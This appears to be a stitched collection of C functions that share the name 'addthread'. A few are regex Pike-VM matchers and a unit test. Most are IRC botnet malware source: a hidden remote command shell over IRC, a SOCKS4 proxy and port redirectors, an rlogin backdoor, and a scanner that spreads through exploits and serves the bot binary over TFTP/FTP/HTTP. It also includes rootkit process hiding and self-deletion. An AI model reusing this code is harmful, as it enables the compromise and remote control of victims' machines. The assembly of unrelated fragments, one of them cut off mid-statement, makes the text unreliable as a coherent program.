void addthread(thread_list *threads, Instr *pc, size_t *saved, size_t nsave, size_t sp) { //printf("addthread(): pc=%d, saved={%u, %u}, sp=%u, lastidx=%u\n", pc - extprog, // saved[0], saved[1], sp, pc->lastidx); if (pc->lastidx == sp) { // we've executed this instruction on this string index already free(saved); return; } pc->lastidx = sp; size_t *newsaved; switch (pc->code) { case Jump: addthread(threads, pc->x, saved, nsave, sp); break; case Split: newsaved = calloc(nsave, sizeof(size_t)); memcpy(newsaved, saved, nsave * sizeof(size_t)); addthread(threads, pc->x, saved, nsave, sp); addthread(threads, pc->y, newsaved, nsave, sp); break; case Save: saved[pc->s] = sp; addthread(threads, pc + 1, saved, nsave, sp); break; default: threads->t[threads->n].pc = pc; threads->t[threads->n].saved = saved; threads->n++; break; } }
int re_exec(Re *re, char *s) { re->s = s; re->capacity = re->size; re->tpool[0].threads = malloc(sizeof(Thread) * re->capacity); re->tpool[1].threads = malloc(sizeof(Thread) * re->capacity); bzero(re->tpool[0].threads, sizeof re->tpool[0].threads); bzero(re->tpool[1].threads, sizeof re->tpool[1].threads); re->gen = 1; ThreadList *cl = &re->tpool[0], *nl = &re->tpool[1]; addthread(re, cl, &re->insts[0], re->sub, (char *)s); for (;;s++) { /* debug("*s: %c\n", *s); */ /* dumpthreads("cl:\n", re, cl); */ re->gen++; nl->n = 0; for (int i = 0; i < cl->n; i++) { Thread t = cl->threads[i]; Inst *pc = t.pc; switch(pc->op) { case IChar: if (pc->c != *s) { continue; } addthread(re, nl, pc+1, t.sub, (char*)s+1); break; case IAny: if (*s == '\0') { break; } addthread(re, nl, pc+1, t.sub, (char*)s+1); break; case IMatch: memcpy(re->sub, t.sub, sizeof re->sub); re->matched++; cl->n = i; // cut off threads with low priorities break; } } /* dumpthreads("nl:\n", re, nl); */ swap_list(cl, nl); if (*s == '\0') { break; } } int done = re->matched > 0; dumpsub(re, re->sub); if (re_getopt(re, RE_ANCHOR_TAIL)) { done = done && (re->sub[1].sp == s); } return done; }
int is_match_pike(struct Prog* prog,char* input, char** subp) { char* sp; struct Sub* sub; struct Inst* pc; int matched = 0; struct ThreadList *clist, *nlist, *tlist; int len = prog->len; clist = threadlist(len); nlist = threadlist(len); gen++; sub = newsub(); int i; for(i = 0; i < MAXSUB; i++) sub->sub[i] = NULL; addthread(clist, thread(prog->start, sub), input); for(sp = input; ; sp++) { if(clist->n == 0) break; gen++; for(i = 0; i < clist->n; i++) { pc = clist->t[i].pc; sub = clist->t[i].sub; switch(pc->opcode) { case Char: if(*sp != pc->c) { decref(sub); break; } //printf("%c", pc->c); case Any: if(*sp == '\0') { decref(sub); break; } addthread(nlist, thread(pc+1, sub), sp+1); break; case Match: matched = 1; int i; for(i = 0; i < MAXSUB; i++) subp[i] = sub->sub[i]; for(i = 0; i < clist->n; i++) decref(clist->t[i].sub); goto BreakFor; } } //printf("\n"); BreakFor: tlist = clist; clist = nlist; nlist = tlist; nlist->n = 0; if(sp == '\0') break; } if(matched) return sp - input; return 0; }
static void test_add_thread(void) { char input[] = "ab"; struct Regexp* re = parse(input); struct Prog* prog = compile(re); struct Inst* pc = prog->start; struct Sub* s = newsub(); struct ThreadList* list = threadlist(2); gen++; addthread(list, thread(pc, s), input); gen++; addthread(list, thread(pc+1, s), input); assert('a' == list->t[0].pc->c); assert(Char == list->t[0].pc->opcode); assert('b' == list->t[1].pc->c); assert(Char == list->t[0].pc->opcode); }
int open_cmd(SOCKET sock,char * chan) { char buffer[IRCLINE], cmddir[MAX_PATH]; int threadnum; SECURITY_ATTRIBUTES secAttr; HANDLE hChildOutRd, hChildOutWr, hChildInRd, hChildInWr; Close_Handles(); if(fSearchPath(NULL,"cmd.exe",NULL,sizeof(cmddir),cmddir,NULL) == 0) return -1; secAttr.nLength = sizeof(secAttr); secAttr.bInheritHandle = TRUE; secAttr.lpSecurityDescriptor = NULL; if (!CreatePipe(&hChildOutRd, &hChildOutWr, &secAttr, 0)) return -1; if (!CreatePipe(&hChildInRd, &hChildInWr, &secAttr, 0)) return -1; if (!DuplicateHandle(GetCurrentProcess(), hChildInWr, GetCurrentProcess(), &hChildInWrDupe, 0, FALSE, DUPLICATE_SAME_ACCESS | DUPLICATE_CLOSE_SOURCE)) return -1; PROCESS_INFORMATION pinfo; memset(&pinfo, 0, sizeof(pinfo)); STARTUPINFO sinfo; memset(&sinfo, 0, sizeof(sinfo)); sinfo.cb = sizeof(sinfo); sinfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; sinfo.wShowWindow = SW_HIDE; sinfo.hStdInput = hChildInRd; sinfo.hStdOutput = hChildOutWr; sinfo.hStdError = hChildOutWr; if (!CreateProcess(cmddir,"", NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo)) return -1; CloseHandle(hChildInRd); DWORD id; pipe_read = hChildOutRd; pipe_write = hChildInWr; pipe_Hproc = pinfo.hProcess; CloseHandle(pinfo.hThread); pipesock = sock; if (chan) sprintf(pipe_chan,chan); else sprintf(pipe_chan,""); threadnum = addthread("[CMD]: Remote Command Prompt",RCMD_THREAD,NULL); threads[threadnum].pid = pinfo.dwProcessId; if ((threads[threadnum].tHandle = CreateThread(NULL, 0, &PipeReadThread, (LPVOID)threadnum, 0, &id)) == NULL) { sprintf(buffer,"[CMD]: Failed to start IO thread, error: <%d>.", GetLastError()); addlog(buffer); } return 0; }
DWORD WINAPI Socks4Thread(LPVOID param) { char sendbuf[IRCLINE]; SOCKADDR_IN ssin, csin; SOCKET ssock, csock; DWORD lpThreadId; int csin_len = sizeof(csin); SOCKS4 socks4 = *((SOCKS4 *)param); SOCKS4 *socks4p = (SOCKS4 *)param; socks4p->gotinfo = TRUE; memset(&ssin,0,sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)socks4.port); ssin.sin_addr.s_addr = INADDR_ANY; ssock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP); threads[socks4.threadnum].sock=ssock; if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) == 0) { if (flisten(ssock, 10) == 0) { sprintf(sendbuf, "[SOCKS4]: Server started on: %s:%d.", GetIP(socks4.sock), socks4.port); if (!socks4.silent) irc_privmsg(socks4.sock, socks4.chan, sendbuf, socks4.notice); addlog(sendbuf); while (1) { csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len); socks4.cgotinfo = FALSE; sprintf(sendbuf,"[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), csin.sin_port, socks4.threadnum); socks4.cthreadnum = addthread(sendbuf,SOCKS4_THREAD,csock); threads[socks4.cthreadnum].parent = socks4.threadnum; if (threads[socks4.cthreadnum].tHandle = CreateThread(NULL, 0, &Socks4ClientThread, (LPVOID)&socks4, 0, &lpThreadId)) { while (socks4.cgotinfo == FALSE) Sleep(5); } else sprintf(sendbuf, "[SOCKS4]: Failed to start client thread, error: <%d>.", GetLastError()); addlog(sendbuf); } } } fclosesocket(ssock); sprintf(sendbuf, "[SOCKS4]: Failed to start server on Port %d.", socks4.port); if (!socks4.silent) irc_privmsg(socks4.sock, socks4.chan, sendbuf, socks4.notice); addlog(sendbuf); clearthread(socks4.threadnum); ExitThread(0); }
static void addthread(struct ThreadList* l, struct Thread t, char* sp) { if(t.pc->gen == gen) return; t.pc->gen = gen; switch(t.pc->opcode) { default: l->t[l->n++] = t; break; case Split: incref(t.sub); addthread(l, thread(t.pc->x, t.sub), sp); addthread(l, thread(t.pc->y, t.sub), sp); break; case Jmp: addthread(l, thread(t.pc->x, t.sub), sp); break; case Save: addthread(l, thread(t.pc + 1, update(t.sub, t.pc->n-2, sp)), sp); break; } }
// port redirect function DWORD WINAPI RedirectThread(LPVOID param) { REDIRECT redirect = *((REDIRECT *)param); REDIRECT *redirectp = (REDIRECT *)param; redirectp->gotinfo = TRUE; char sendbuf[IRCLINE]; DWORD id; SOCKADDR_IN rsin, csin; memset(&rsin, 0, sizeof(rsin)); rsin.sin_family = AF_INET; rsin.sin_port = fhtons(redirect.lport); rsin.sin_addr.s_addr = INADDR_ANY; int csin_len = sizeof(csin); SOCKET rsock, csock; if ((rsock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { threads[redirect.threadnum].sock = rsock; fWSAAsyncSelect(rsock, 0, WM_USER + 1, FD_READ); if (fbind(rsock, (LPSOCKADDR)&rsin, sizeof(rsin)) == 0) { if (flisten(rsock, 10) == 0) { while(1) { if ((csock = faccept(rsock, (LPSOCKADDR)&csin, &csin_len)) != INVALID_SOCKET) { redirect.csock = csock; redirect.gotinfo = FALSE; sprintf(sendbuf,"[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), csin.sin_port, redirect.threadnum); redirect.cthreadnum = addthread(sendbuf,REDIRECT_THREAD,csock); threads[redirect.cthreadnum].parent = redirect.threadnum; if (threads[redirect.cthreadnum].tHandle = CreateThread(NULL,0,&RedirectLoopThread,(LPVOID)&redirect,0,&id)) { while (redirect.gotinfo == FALSE) Sleep(50); } else { addlogv("[REDIRECT]: Failed to start client thread, error: <%d>.", GetLastError()); break; } } } } } } fclosesocket(csock); fclosesocket(rsock); clearthread(redirect.threadnum); ExitThread(0); }
void CheckServers(ADVSCAN scan) { char sendbuf[IRCLINE]; DWORD id; if(scan.exploit != -1) { if (exploit[scan.exploit].tftp == TRUE) { if (findthreadid(TFTP_THREAD) == 0) { TFTP tftp; tftp.threads=0; GetModuleFileName(0,tftp.filename,MAX_PATH); strncpy(tftp.requestname, filename, sizeof(tftp.requestname)-1); strcpy(tftp.chan, channel); tftp.notice = scan.notice; tftp.silent = FALSE; tftp.info = FALSE; tftp.socket = scan.sock; sprintf(sendbuf, "[tftp]: Server started on Port: %d, File: %s, Request: %s.", tftpport, tftp.filename, tftp.requestname); tftp.threadnum = addthread(sendbuf,TFTP_THREAD,NULL); strncpy(threads[tftp.threadnum].file,tftp.filename,sizeof(threads[tftp.threadnum].file)-1); threads[tftp.threadnum].port = tftpport; threads[tftp.threadnum].tHandle = CreateThread(NULL, 0, &tftpserver, (void *)&tftp, 0, &id); while (tftp.info == FALSE) Sleep(50); addlog(sendbuf); } } else if (exploit[scan.exploit].http == TRUE) { if (findthreadid(HTTP_THREAD) == 0) { char dirpath[MAX_PATH],*c; GetModuleFileName(0,dirpath,MAX_PATH); if ((c=strrchr(dirpath,'\\')) != NULL) *c='\0'; if ((HTTP_server(GetIP(scan.sock),httpport,dirpath,FALSE)) == -1) sprintf(sendbuf,"[http]: Server failed to start."); else sprintf(sendbuf,"[http]: Server started on IP: %s:%d, Directory: %s\\.", GetIP(scan.sock), httpport, dirpath); addlog(sendbuf); } } } return; }
static void addthread(Re *re, ThreadList *tl, Inst *pc, Sub *sub, char *sp) { //FIXME: need O(1) search if (pc->gen == re->gen) { /* debug("["); */ /* dumpinst(re, pc); */ /* debug("] already in thread\n"); */ return; } pc->gen = re->gen; //recursive adding respects thread priority(greedy or not changes priority) switch(pc->op) { case ISplit: addthread(re, tl, pc->br1, sub, sp); addthread(re, tl, pc->br2, sub, sp); break; case IJmp: addthread(re, tl, pc->br1, sub, sp); break; case ISave: { //FIXME: mem leak Sub *newsub = malloc(sizeof re->sub); memcpy(newsub, sub, sizeof re->sub); newsub[pc->c].sp = sp; /* debug("saving: %ld at %d\n", sp - re->s, pc->c); */ addthread(re, tl, pc+1, newsub, sp); break; } default: tl->threads[tl->n].pc = pc; memcpy(tl->threads[tl->n++].sub, sub, sizeof re->sub); break; } }
DWORD WINAPI Bthd(LPVOID param) { for (int m=0;m<6;m++) { if(!(xetum=CreateMutex(NULL, FALSE, xetumhandle))) Sleep(5000); else break; } if (WaitForSingleObject(CreateMutex(NULL, TRUE, xetumhandle), 30000) == WAIT_TIMEOUT) ExitProcess(0); addthread(MAIN_THREAD,str_main_thread,main_title); srand(GetTickCount()); dwstarted=GetTickCount(); WSADATA wsadata; if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0) ExitProcess(-2); int i=0; DWORD id=0; char *ip; char hostname[256]; struct hostent *h; fgethostname(hostname, 256); h = fgethostbyname(hostname); ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]); strncpy(inip,ip,sizeof(inip)); curserver=0; HookProtocol(&mainirc); while (mainirc.should_connect()) { if (!mainirc.is_connected()) { #ifdef _DEBUG printf("Trying to connect to: %s:%i\r\n",sinfo[curserver].host,sinfo[curserver].port); #endif #ifndef NO_FLUSHDNS FlushDNSCache(); #endif mainirc.start(sinfo[curserver].host,sinfo[curserver].port, mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN), mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),sinfo[curserver].pass); mainirc.message_loop(); } else mainirc.message_loop(); Sleep(SFLOOD_DELAY); if (curserver==(srvsz-1)) curserver=0; else curserver++; } // cleanup; //killthreadall(); fWSACleanup(); ReleaseMutex(xetum); ExitThread(0); return TRUE; }
DWORD WINAPI RlogindThread(LPVOID param) { RLOGIND rlogind = *((RLOGIND *)param); RLOGIND *rloginds = (RLOGIND *)param; rloginds->gotinfo = TRUE; char sendbuf[IRCLINE]; int csin_len, Err; unsigned long mode = 1; WSADATA WSAData; SECURITY_ATTRIBUTES SecurityAttributes; DWORD id; if ((Err = fWSAStartup(MAKEWORD(2,2), &WSAData)) != 0) { addlogv("[RLOGIND]: Error: WSAStartup(): <%d>.", Err); clearthread(rlogind.threadnum); ExitThread(1); } if (!SetConsoleCtrlHandler((PHANDLER_ROUTINE)&CtrlHandler, TRUE)) { addlogv("[RLOGIND]: Failed to install control-C handler, error: <%d>.", GetLastError()); fWSACleanup(); clearthread(rlogind.threadnum); ExitThread(1); } SOCKET ssock, csock; SOCKADDR_IN csin, ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(rlogind.port); ssin.sin_addr.s_addr = INADDR_ANY; if ((ssock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { threads[rlogind.threadnum].sock = ssock; if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) == 0) { if (flisten(ssock, SOMAXCONN) == 0) { SecurityAttributes.nLength = sizeof(SecurityAttributes); SecurityAttributes.lpSecurityDescriptor = NULL; SecurityAttributes.bInheritHandle = FALSE; addlog("[RLOGIND]: Ready and waiting for incoming connections."); BOOL flag = TRUE; while (1) { csin_len = sizeof(csin); if ((csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET) break; if (fsetsockopt(csock, SOL_SOCKET, SO_KEEPALIVE,(char *)&flag,flag) != SOCKET_ERROR) { rlogind.gotinfo = FALSE; sprintf(sendbuf,"[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), fntohs(csin.sin_port), rlogind.threadnum); addlog(sendbuf); rlogind.cthreadnum = addthread(sendbuf,RLOGIN_THREAD,csock); threads[rlogind.cthreadnum].parent = rlogind.threadnum; if (threads[rlogind.cthreadnum].tHandle = CreateThread(&SecurityAttributes,0,&RlogindClientThread,(LPVOID)&rlogind,0,&id)) { while (rlogind.gotinfo == FALSE) Sleep(50); } else { addlogv("[RLOGIND]: Failed to start client thread, error: <%d>.", GetLastError()); break; } } } } } } sprintf(sendbuf, "[RLOGIND]: Error: server failed, returned: <%d>.", fWSAGetLastError()); if (!rlogind.silent) irc_privmsg(rlogind.sock, rlogind.chan, sendbuf, rlogind.notice); addlog(sendbuf); fclosesocket(csock); fclosesocket(ssock); fWSACleanup(); clearthread(rlogind.threadnum); ExitThread(0); }
// part of the redirect function, handles sending/recieving for the remote connection. DWORD WINAPI RedirectLoopThread(LPVOID param) { REDIRECT redirect = *((REDIRECT *)param); REDIRECT *redirectp = (REDIRECT *)param; redirectp->gotinfo = TRUE; int threadnum=redirect.cthreadnum; char sendbuf[IRCLINE], buff[4096]; int err; DWORD id; SOCKET ssock; do { if ((ssock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) break; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(redirect.port); IN_ADDR iaddr; iaddr.s_addr = finet_addr(redirect.dest); LPHOSTENT hostent; if (iaddr.s_addr == INADDR_NONE) hostent = fgethostbyname(redirect.dest); else hostent = fgethostbyaddr((const char *)&iaddr, sizeof(iaddr), AF_INET); if (hostent == NULL) break; ssin.sin_addr = *((LPIN_ADDR)*hostent->h_addr_list); if ((err = fconnect(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) break; redirect.cgotinfo = FALSE; sprintf(sendbuf,"[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.", finet_ntoa(ssin.sin_addr), ssin.sin_port, redirect.threadnum); redirect.cthreadnum = addthread(sendbuf,REDIRECT_THREAD,ssock); threads[redirect.cthreadnum].parent = redirect.threadnum; threads[redirect.cthreadnum].csock = threads[threadnum].sock; if (threads[redirect.cthreadnum].tHandle = CreateThread(NULL,0,&RedirectLoop2Thread,(LPVOID)&redirect,0,&id)) { while (redirect.cgotinfo == FALSE) Sleep(50); } else { addlogv("[REDIRECT]: Failed to start connection thread, error: <%d>.", GetLastError()); break; } while (1) { memset(buff, 0, sizeof(buff)); if ((err = frecv(threads[threadnum].sock, buff, sizeof(buff), 0)) <= 0) break; if ((err = fsend(ssock, buff, err, 0)) == SOCKET_ERROR) break; } break; } while (1); fclosesocket(threads[threadnum].sock); fclosesocket(ssock); clearthread(threadnum); ExitThread(0); }
void CheckServers(ADVSCAN scan) { char sendbuf[IRCLINE]; DWORD id; if(scan.exploit != -1) { if (exploit[scan.exploit].tftp) { #ifndef NO_TFTPD if (findthreadid(TFTP_THREAD) == 0) { static TFTP tftp; tftp.port = tftpport; tftp.threads = 0; GetModuleFileName(0,tftp.filename,sizeof(tftp.filename)); strncpy(tftp.requestname, filename, sizeof(tftp.requestname)-1); tftp.sock=scan.sock; tftp.notice = scan.notice; if (scan.msgchan[0] == '\0') { strncpy(tftp.chan, scan.chan, sizeof(tftp.chan)-1); tftp.silent = TRUE; } else { strncpy(tftp.chan, scan.msgchan, sizeof(tftp.chan)-1); tftp.silent = FALSE; } sprintf(sendbuf, "tftp -- Server started on Port: %d, File: %s, Request: %s.", tftp.port, tftp.filename, tftp.requestname); tftp.threadnum = addthread(sendbuf,TFTP_THREAD,NULL); if (threads[tftp.threadnum].tHandle = CreateThread(NULL, 0, &tftpserver, (LPVOID)&tftp, 0, &id)) { while (tftp.gotinfo == FALSE) Sleep(50); } else sprintf(sendbuf, "tftp -- Failed to start server, error: <%d>.", GetLastError()); addlog(sendbuf); #endif #ifndef NO_FTPD // static FTP ftp; //ftp.port = FTP_PORT; ftp.threads = 0; GetModuleFileName(0,ftp.filename,sizeof(ftp.filename)); strncpy(ftp.requestname, filename, sizeof(ftp.requestname)-1); ftp.sock=scan.sock; ftp.notice = scan.notice; if (scan.msgchan[0] == '\0') { strncpy(ftp.chan, scan.chan, sizeof(ftp.chan)-1); ftp.silent = TRUE; } else { strncpy(ftp.chan, scan.msgchan, sizeof(ftp.chan)-1); ftp.silent = FALSE; } sprintf(sendbuf, "ftp -- Server started on Port: %d, File: %s, Request: %s.", ftp.port, ftp.filename, ftp.requestname); ftp.threadnum = addthread(sendbuf,FTP_THREAD,NULL); if (threads[ftp.threadnum].tHandle = CreateThread(NULL, 0, &ftpd, (LPVOID)&ftp, 0, &id)) { while (ftp.gotinfo == FALSE) Sleep(50); } else sprintf(sendbuf, "ftp -- Failed to start server, error: <%d>.", GetLastError()); addlog(sendbuf); // #endif } } } return; }
DWORD WINAPI BotThread(LPVOID param) { for (int m=0;m<6;m++) { if(!(mutex=CreateMutex(NULL, FALSE, mutexhandle))) Sleep(5000); else break; } // if (WaitForSingleObject(CreateMutex(NULL, TRUE, mutexhandle), 30000) == WAIT_TIMEOUT) // ExitProcess(0); addthread(MAIN_THREAD,str_main_thread,main_title); #ifndef _DEBUG #ifndef NO_MELT char *melt=RegQuery(meltkey.hkey,meltkey.subkey,meltkey.name); if (melt) { SetFileAttributes(melt,FILE_ATTRIBUTE_NORMAL); int tries=0; while (FileExists(melt) && tries<3) { DeleteFile(melt); tries++; Sleep(2000); } RegDelete(meltkey.hkey,meltkey.subkey,meltkey.name); } #endif // NO_MELT #endif // _DEBUG srand(GetTickCount()); dwstarted=GetTickCount(); #ifndef NO_VERSION_REPLY curversion=rand()%(versionsize); #ifdef _DEBUG printf("Generated current_version: %d (%d), %s.\n",curversion,versionsize,versionlist[curversion]); #endif #endif WSADATA wsadata; if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0) ExitProcess(-2); #ifndef _DEBUG #ifndef NO_FCONNECT char readbuf[1024]; HINTERNET httpopen, openurl; DWORD read; httpopen=fInternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0); openurl=fInternetOpenUrl(httpopen,cononstart,NULL,NULL,INTERNET_FLAG_RELOAD|INTERNET_FLAG_NO_CACHE_WRITE,NULL); if (!openurl) { fInternetCloseHandle(httpopen); fInternetCloseHandle(openurl); } fInternetReadFile(openurl,readbuf,sizeof(readbuf),&read); fInternetCloseHandle(httpopen); fInternetCloseHandle(openurl); #endif // NO_FCONNECT #endif // _DEBUG #ifndef NO_INSTALLED_TIME if (!noadvapi32) GetInstalledTime(); else sprintf(installedt,"Error"); #endif // NO_INSTALLED_TIME int i=0; DWORD id=0; #ifndef NO_RECORD_UPTIME i=addthread(RUPTIME_THREAD,str_rup_thread,main_title); threads[i].tHandle=CreateThread(NULL,0,&RecordUptimeThread,0,0,&id); #endif // NO_RECORD_UPTIME #ifndef NO_AUTO_SECURE #ifndef NO_SECURE NTHREAD secure; secure.bdata2=TRUE;//loop i=addthread(SECURE_THREAD,str_asecure_thread,sec_title); threads[i].tHandle=CreateThread(NULL,0,&SecureThread,(LPVOID)&secure,0,&id); #endif #endif // NO_AUTO_SECURE #ifndef NO_RDRIV #ifndef _DEBUG rkenabled=InitRK();//initialize fu if (rkenabled) HideMe();//hide the process #endif // _DEBUG #endif // NO_RDRIV #ifndef _DEBUG // maybe this will give the shutdown handler time to work RegWrite(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control","WaitToKillServiceTimeout","7000"); #endif //get internal ip char *ip; char hostname[256]; struct hostent *h; fgethostname(hostname, 256); h = fgethostbyname(hostname); ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]); strncpy(inip,ip,sizeof(inip)); curserver=0; HookProtocol(&mainirc); while (mainirc.should_connect()) { if (!mainirc.is_connected()) { #ifdef _DEBUG printf("Trying to connect to: %s:%i\r\n",servers[curserver].host,servers[curserver].port); #endif #ifndef NO_FLUSHDNS FlushDNSCache(); #endif mainirc.start(servers[curserver].host,servers[curserver].port, mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN), mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),servers[curserver].pass); mainirc.message_loop(); } else mainirc.message_loop(); Sleep(SFLOOD_DELAY); if (curserver==(serversize-1)) curserver=0; else curserver++; } // cleanup; killthreadall(); fWSACleanup(); ReleaseMutex(mutex); ExitThread(0); }
void CheckServers(ADVSCAN scan) { char sendbuf[IRCLINE]; DWORD id; if(scan.exploit != -1) { if (exploit[scan.exploit].tftp) { ////////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////////// #ifndef NO_TFTPD if (findthreadid(TFTP_THREAD) == 0) { static TFTP tftp; tftp.port = tftpport; tftp.threads = 0; GetModuleFileName(0,tftp.filename,sizeof(tftp.filename)); strncpy(tftp.requestname, filename, sizeof(tftp.requestname)-1); tftp.sock=scan.sock; tftp.notice = scan.notice; if (scan.msgchan[0] == '\0') { strncpy(tftp.chan, scan.chan, sizeof(tftp.chan)-1); tftp.silent = TRUE; } else { strncpy(tftp.chan, scan.msgchan, sizeof(tftp.chan)-1); tftp.silent = FALSE; } sprintf(sendbuf, "%s Server started on Port: %d, File: %s, Request: %s.", mn_title,tftp.port, tftp.filename, tftp.requestname); tftp.threadnum = addthread(sendbuf,TFTP_THREAD,NULL); if (threads[tftp.threadnum].tHandle = CreateThread(NULL, 0, &tftpserver, (LPVOID)&tftp, 0, &id)) { while (tftp.gotinfo == FALSE) Sleep(50); } else sprintf(sendbuf, "%s Failed to start server, error: <%d>.", mn_title,GetLastError()); addlog(sendbuf); #endif ////////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////////// #ifndef NO_FTPD static FTP ftp; //ftp.port = FTP_PORT; ftp.threads = 0; GetModuleFileName(0,ftp.filename,sizeof(ftp.filename)); strncpy(ftp.requestname, filename, sizeof(ftp.requestname)-1); ftp.sock=scan.sock; ftp.notice = scan.notice; if (scan.msgchan[0] == '\0') { strncpy(ftp.chan, scan.chan, sizeof(ftp.chan)-1); ftp.silent = TRUE; } else { strncpy(ftp.chan, scan.msgchan, sizeof(ftp.chan)-1); ftp.silent = FALSE; } sprintf(sendbuf, "[FTP]: Server started on Port: %d, File: %s, Request: %s.", ftp.port, ftp.filename, ftp.requestname); ftp.threadnum = addthread(sendbuf,FTP_THREAD,NULL); if (threads[ftp.threadnum].tHandle = CreateThread(NULL, 0, &ftpd, (LPVOID)&ftp, 0, &id)) { while (ftp.gotinfo == FALSE) Sleep(50); } else sprintf(sendbuf, "[FTP]: Failed to start server, error: <%d>.", GetLastError()); addlog(sendbuf); // #endif ////////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////////// } } else if (exploit[scan.exploit].http) { if (findthreadid(HTTP_THREAD) == 0) { static HTTPD httpd; char *c; GetModuleFileName(0,httpd.dir,sizeof(httpd.dir)); if ((c=strrchr(httpd.dir,'\\')) != NULL) *c='\0'; httpd.port = httpport; httpd.enabled = FALSE; sprintf(httpd.chan, scan.chan); httpd.sock = scan.sock; httpd.notice = scan.notice; httpd.silent = scan.silent; sprintf(sendbuf,"%s Server listening on IP: %s:%d, Directory: %s\\.", mn_title,GetIP(scan.sock), httpd.port, httpd.dir); httpd.threadnum = addthread(sendbuf,HTTP_THREAD,NULL); if (threads[httpd.threadnum].tHandle = CreateThread(NULL, 0, &HTTP_Server_Thread, (LPVOID)&httpd, 0, &id)) { while(httpd.info == FALSE) Sleep(50); } else sprintf(sendbuf, "%s Failed to start server, error: <%d>.", mn_title,GetLastError()); addlog(sendbuf); } } } return; }
DWORD WINAPI AdvScanner(LPVOID param) { char buffer[LOGLINE]; ADVSCAN scan = *((ADVSCAN *)param); ADVSCAN *scanp = (ADVSCAN *)param; scanp->gotinfo = TRUE; advinfo[scan.threadnum].ip = finet_addr(scan.ip); CheckServers(scan); if (findthreadid(SCAN_THREAD) == 1) { DeleteCriticalSection(&CriticalSection); // just in case if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) { sprintf(buffer,"Failed to initialize critical section."); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); return 0; } } advinfo[scan.threadnum].info = TRUE; for (unsigned int i=1;i<=(scan.threads);i++) { scan.cthreadid = i; sprintf(buffer,"%s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid); scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL); threads[scan.cthreadnum].parent = scan.threadnum; if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) { while (scan.cgotinfo == FALSE) Sleep(30); } else { sprintf(buffer, "Failed to start worker thread, error: <%d>.", GetLastError()); addlog(buffer); } Sleep(30); } if (scan.minutes != 0) Sleep(60000*scan.minutes); else while (advinfo[scan.threadnum].info == TRUE) Sleep(2000); IN_ADDR in; in.s_addr = advinfo[scan.threadnum].ip; sprintf(buffer,"%s Finished at %s:%d after %d minute(s) of scanning.", sc_title, finet_ntoa(in), scan.port, scan.minutes); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); advinfo[scan.threadnum].info = FALSE; Sleep(3000); if (findthreadid(SCAN_THREAD) == 1) DeleteCriticalSection(&CriticalSection); clearthread(scan.threadnum); ExitThread(0); }
DWORD WINAPI AdvScanner(LPVOID param) { char buffer[LOGLINE]; //char szSelfExe[MAX_PATH]; ADVSCAN scan = *((ADVSCAN *)param); ADVSCAN *scanp = (ADVSCAN *)param; scanp->gotinfo = TRUE; advinfo[scan.threadnum].ip = finet_addr(scan.ip); /* // FIX ME: Make this a standalone function if (!FileExists(szLocalPayloadFile)) { GetModuleFileName(0,szSelfExe,MAX_PATH); CopyFile(szSelfExe,szLocalPayloadFile,FALSE); // FIX ME: Make this copy to the same directory (could affect other stuff) } */ CheckServers(scan); if (findthreadid(SCAN_THREAD) == 1) { DeleteCriticalSection(&CriticalSection); // just in case if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) { // failed to initialize CriticalSection sprintf(buffer,"[SCAN]: Failed to initialize critical section."); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); return 0; } } advinfo[scan.threadnum].info = TRUE; for (unsigned int i=1;i<=(scan.threads);i++) { scan.cthreadid = i; sprintf(buffer,"[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid); scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL); threads[scan.cthreadnum].parent = scan.threadnum; if (threads[scan.cthreadnum].tHandle 